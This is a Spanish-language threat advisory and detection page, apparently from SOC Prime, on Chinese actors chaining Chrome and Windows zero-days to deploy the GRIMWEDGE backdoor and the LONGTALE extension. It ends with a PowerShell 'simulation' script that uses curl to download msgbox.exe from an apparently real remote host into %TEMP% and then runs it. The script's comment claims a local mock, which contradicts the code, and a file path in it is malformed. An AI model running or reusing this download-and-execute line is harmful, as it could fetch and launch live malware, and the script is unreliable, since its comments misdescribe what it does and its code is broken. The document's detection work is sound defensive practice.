SOC Prime Bias: Critical

10 Sep 2026 15:37 UTC

Actores de amenaza chinos encadenan vulnerabilidades de día cero en navegadores y Windows

Author Photo
SOC Prime Team linkedin icon Seguir
Actores de amenaza chinos encadenan vulnerabilidades de día cero en navegadores y Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Dos actores de amenaza chinos, UTA0560 y JungleBamboo, están utilizando una cadena de explotación sofisticada de múltiples etapas que apunta a Google Chrome y al núcleo de Windows. Los ataques aprovechan un período de brecha de parches en el que las vulnerabilidades se corrigen en Chromium antes de que las actualizaciones correspondientes lleguen a las versiones de Google Chrome liberadas. Los señuelos de spear-phishing entregan diferentes cargas útiles, incluido el backdoor JScript GRIMWEDGE y la extensión de Chrome LONGTALE.

Investigación

El monitoreo de seguridad de red de Volexity identificó una campaña de spear-phishing dirigida a ONGs el 1 de septiembre de 2026. La investigación descubrió una cadena de explotación compartida que involucra CVE-2026-85046, CVE-2026-87491 y CVE-2026-85880. Los analistas separaron la actividad en dos grupos: UTA0560 implementando GRIMWEDGE y JungleBamboo utilizando SUPERSTOMP para instalar la extensión LONGTALE.

Mitigación

Las organizaciones deben mantener Google Chrome actualizado a la última versión disponible para reducir la exposición durante los períodos de brecha de parches. Los equipos de seguridad deben monitorear comportamientos inusuales en procesos hijos de Chrome e instalaciones no autorizadas de extensiones de Chrome. También se recomienda un filtrado de correo fuerte para señuelos de spear-phishing y monitoreo de la creación de tareas programadas sospechosas o no autorizadas.

Respuesta

Si se detecta explotación, los hosts afectados deben ser aislados inmediatamente para prevenir más comunicaciones de comando y control o movimiento lateral. Los respondedores deben realizar forense de memoria en los procesos de Chrome para identificar shellcode inyectado. También se deben auditar las extensiones instaladas de Chrome y revisar las tareas programadas en busca de entradas sospechosas como Sistema Programado de Windows.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Deteccciones

Uso sospechoso de CURL (mediante línea de comandos)

Equipo de SOC Prime
10 Sep 2026

Comando y control sospechoso por solicitud DNS de un dominio de nivel superior (TLD) inusual (mediante dns)

Equipo de SOC Prime
10 Sep 2026

Tarea programada sospechosa (mediante auditoría)

Equipo de SOC Prime
10 Sep 2026

IOCs (HashSha256) para detectar: Cuida la brecha (Patch) Gap: Varios actores de amenaza chinos encadenan exploits 0-day en Chrome y Windows

Reglas de IA de SOC Prime
10 Sep 2026

IOCs (FuenteIP) para detectar: Cuida la brecha (Patch) Gap: Varios actores de amenaza chinos encadenan exploits 0-day en Chrome y Windows

Reglas de IA de SOC Prime
10 Sep 2026

IOCs (DestinoIP) para detectar: Cuida la brecha (Patch) Gap: Varios actores de amenaza chinos encadenan exploits 0-day en Chrome y Windows

Reglas de IA de SOC Prime
10 Sep 2026

Páginas de aterrizaje de la cadena de explotación Zero-Day de Chrome [Servidor web]

Reglas de IA de SOC Prime
10 Sep 2026

Detección de GRIMWEDGE JScript Backdoor y actividad de entrega de carga útil [Creación de proceso de Windows]

Reglas de IA de SOC Prime
10 Sep 2026

Ejecución de simulación

  • Narrativa de ataque y comandos: El adversario busca establecer una presencia en el sistema comprometido al desplegar el backdoor JScript GRIMWEDGE. Para evitar la detección por AV basado en firmas simples, el atacante utiliza cmd.exe y la utilidad nativa curl para descargar un cargador de segundo nivel llamado msgbox.exe desde una infraestructura remota de comando y control (C2). Una vez completada la descarga, el atacante ejecuta inmediatamente la carga útil desde el %TEMP% directorio para minimizar el tiempo que el archivo permanece en el disco y utilizar un directorio que a menudo es pasado por alto por la monitorización básica. Esta secuencia está diseñada para coincidir con el patrón específico de línea de comandos que la regla de detección busca.

  • Script de prueba regresiva:

    # Script de simulación para activar la regla de detección de GRIMWEDGE.
    # Este script crea un archivo ficticio para simular la carga útil descargada.
    
    $tempDir = $env:TEMP
    $payloadName = "msgbox.exe"
    $payloadPath = Join-Path $tempDir $payloadName
    
    # 1. Crear un 'msgbox.exe' ficticio para simular la carga útil descargada
    # En un ataque real, este sería el binario malicioso real.
    New-Item -Path $payloadPath -ItemType File -Force
    Set-Content -Path $payloadPath -Value "Contenido de carga útil ficticia"
    
    # 2. Ejecutar la cadena de comandos exacta identificada en la lógica de detección.
    # Nota: Usamos un enfoque de echo/mock local para la URL para asegurar que la cadena de comandos coincida exactamente.
    cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe"""
    
    Write-Host "Simulación completada. Verifique SIEM para alertas que coincidan con el patrón GRIMWEDGE."
  • Comandos de limpieza:

    # Script de limpieza para eliminar la carga útil simulada y archivos.
    $tempDir = $env:TEMP
    $payloadPath = Join-Path $tempDir "msgbox.exe"
    
    if (Test-Path $payloadPath) {
        Remove-Item -Path $payloadPath -Force
        Write-Host "Limpieza exitosa: $payloadPath eliminado."
    } else {
        Write-Host "Carga útil no encontrada. Limpieza innecesaria."
    }